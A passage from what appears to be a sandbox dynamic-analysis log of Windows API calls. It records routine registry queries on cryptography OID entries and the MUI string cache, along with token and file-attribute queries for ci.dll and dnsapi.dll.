0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7" }, { "name": "Handle", "value": "0x00000548" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7" } ], "repeated": 0, "id": 1536 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10c2e92", "parentcaller": "0x7ffee10ffb6e", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\System32\\ci.dll,-101" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7\\Name" } ], "repeated": 0, "id": 1537 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baeb5", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" } ], "repeated": 0, "id": 1538 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf05", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "ValueName", "value": "StringCacheGeneration" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration" } ], "repeated": 0, "id": 1539 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf2f", "parentcaller": "0x7ffee10ba4cb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1540 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34a6c8b", "parentcaller": "0x7ffee34867b5", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1541 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34867ec", "parentcaller": "0x7ffee10bfa4e", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 1542 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10bf9e9", "parentcaller": "0x7ffee10cad45", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x0002001f", "pretty_value": "KEY_READ|KEY_WRITE" }, { "name": "ObjectAttributesHandle", "value": "0x0000054c" }, { "name": "ObjectAttributesName", "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" } ], "repeated": 0, "id": 1543 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10bfa05", "parentcaller": "0x7ffee10cad45", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1544 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10c07f5", "parentcaller": "0x7ffee10ba864", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\ci.dll" } ], "repeated": 0, "id": 1545 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10be270", "parentcaller": "0x7ffee10bb8b0", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "ValueName", "value": "@%SystemRoot%\\System32\\ci.dll,-101" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "Enclave" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-101" } ], "repeated": 0, "id": 1546 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10ba8d5", "parentcaller": "0x7ffee10ffc2b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1547 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10c2e92", "parentcaller": "0x7ffee10ffb6e", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\System32\\ci.dll,-101" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7\\Name" } ], "repeated": 0, "id": 1548 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baeb5", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" } ], "repeated": 0, "id": 1549 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf05", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "ValueName", "value": "StringCacheGeneration" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration" } ], "repeated": 0, "id": 1550 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf2f", "parentcaller": "0x7ffee10ba4cb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1551 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34a6c8b", "parentcaller": "0x7ffee34867b5", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1552 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34867ec", "parentcaller": "0x7ffee10bfa4e", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 1553 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10bf9e9", "parentcaller": "0x7ffee10cad45", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x0002001f", "pretty_value": "KEY_READ|KEY_WRITE" }, { "name": "ObjectAttributesHandle", "value": "0x00000550" }, { "name": "ObjectAttributesName", "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" } ], "repeated": 0, "id": 1554 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10bfa05", "parentcaller": "0x7ffee10cad45", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1555 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10c07f5", "parentcaller": "0x7ffee10ba864", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\ci.dll" } ], "repeated": 0, "id": 1556 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10be270", "parentcaller": "0x7ffee10bb8b0", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "ValueName", "value": "@%SystemRoot%\\System32\\ci.dll,-101" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "Enclave" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-101" } ], "repeated": 0, "id": 1557 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10ba8d5", "parentcaller": "0x7ffee10ffc2b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1558 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbf464", "parentcaller": "0x7ffee0bbf2b2", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" } ], "repeated": 0, "id": 1559 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe88e", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000544" } ], "repeated": 0, "id": 1560 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe781", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000540" }, { "name": "Index", "value": "2" }, { "name": "Name", "value": "1.3.6.1.4.1.311.64.1.1!7" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7" } ], "repeated": 0, "id": 1561 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe7b1", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000540" }, { "name": "SubKey", "value": "1.3.6.1.4.1.311.64.1.1!7" }, { "name": "Handle", "value": "0x00000544" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7" } ], "repeated": 0, "id": 1562 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe9c3", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegQueryInfoKeyW", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000544" }, { "name": "Class", "value": "" }, { "name": "SubKeyCount", "value": "0" }, { "name": "MaxSubKeyLength", "value": "0" }, { "name": "MaxClassLength", "value": "0" }, { "name": "ValueCount", "value": "1" }, { "name": "MaxValueNameLength", "value": "4" }, { "name": "MaxValueLength", "value": "78" } ], "repeated": 0, "id": 1563 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbeac9", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000544" }, { "name": "Index", "value": "0" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\system32\\dnsapi.dll,-103" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name" } ], "repeated": 0, "id": 1564 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbf1d0", "parentcaller": "0x7ffee0bb34e9", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7" }, { "name": "Handle", "value": "0x00000548" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7" } ], "repeated": 0, "id": 1565 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10c2e92", "parentcaller": "0x7ffee10ffb6e", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\system32\\dnsapi.dll,-103" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name" } ], "repeated": 0, "id": 1566 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baeb5", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" } ], "repeated": 0, "id": 1567 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf05", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "ValueName", "value": "StringCacheGeneration" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration" } ], "repeated": 0, "id": 1568 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf2f", "parentcaller": "0x7ffee10ba4cb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1569 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34a6c8b", "parentcaller": "0x7ffee34867b5", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1570 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34867ec", "parentcaller": "0x7ffee10bfa4e", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 1571 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10bf9e9", "parentcaller": "0x7ffee10cad45", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x0002001f", "pretty_value": "KEY_READ|KEY_WRITE" }, { "name": "ObjectAttributesHandle", "value": "0x0000054c" }, { "name": "ObjectAttributesName", "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" } ], "repeated": 0, "id": 1572 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10bfa05", "parentcaller": "0x7ffee10cad45", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1573 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10c07f5", "parentcaller": "0x7ffee10ba864", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\dnsapi.dll" } ], "repeated": 0, "id": 1574 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10be270", "parentcaller": "0x7ffee10bb8b0", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "ValueName", "value": "@%SystemRoot%\\system32\\dnsapi.dll,-103" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "\\x414\\x43e\\x432\\x435\\x440\\x435\\x43d\\x43d\\x44b\\x439 DNS-\\x441\\x435\\x440\\x432\\x435\\x440" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\dnsapi.dll,-103" } ], "repeated": 0, "id": 1575 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10ba8d5", "parentcaller": "0x7ffee10ffc2b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1576 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10c2e92", "parentcaller": "0x7ffee10ffb6e", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\system32\\dnsapi.dll,-103" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name" } ], "repeated": 0, "id": 1577 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baeb5", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" } ], "repeated": 0, "id": 1578 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf05", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "ValueName", "value": "StringCacheGeneration" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration" } ], "repeated": 0, "id": 1579 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf2f", "parentcaller": "0x7ffee10ba4cb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1580 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34a6c8b", "parentcaller": "0x7ffee34867b5", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1581 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34867ec", "parentcaller": "0x7ffee10bfa4e", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 1582 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10bf9e9", "parentcaller": "0x7ffee10cad45", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x0002001f", "pretty_value": "KEY_READ|KEY_WRITE" }, { "name": "ObjectAttributesHandle", "value": "0x00000550" }, { "name": "ObjectAttributesName", "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" } ], "repeated": 0, "id": 1583 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10bfa05", "parentcaller": "0x7ffee10cad45", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1584 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10c07f5", "parentcaller": "0x7ffee10ba864", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\dnsapi.dll" } ], "repeated": 0, "id": 1585 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10be270", "parentcaller": "0x7ffee10bb8b0", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "ValueName", "value": "@%SystemRoot%\\system32\\dnsapi.dll,-103" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "\\x414\\x43e\\x432\\x435\\x440\\x435\\x43d\\x43d\\x44b\\x439 DNS-\\x441\\x435\\x440\\x432\\x435\\x440" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\dnsapi.dll,-103" } ], "repeated": 0, "id": 1586 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10ba8d5", "parentcaller": "0x7ffee10ffc2b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1587 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbf464", "parentcaller": "0x7ffee0bbf2b2", "category": "registry", 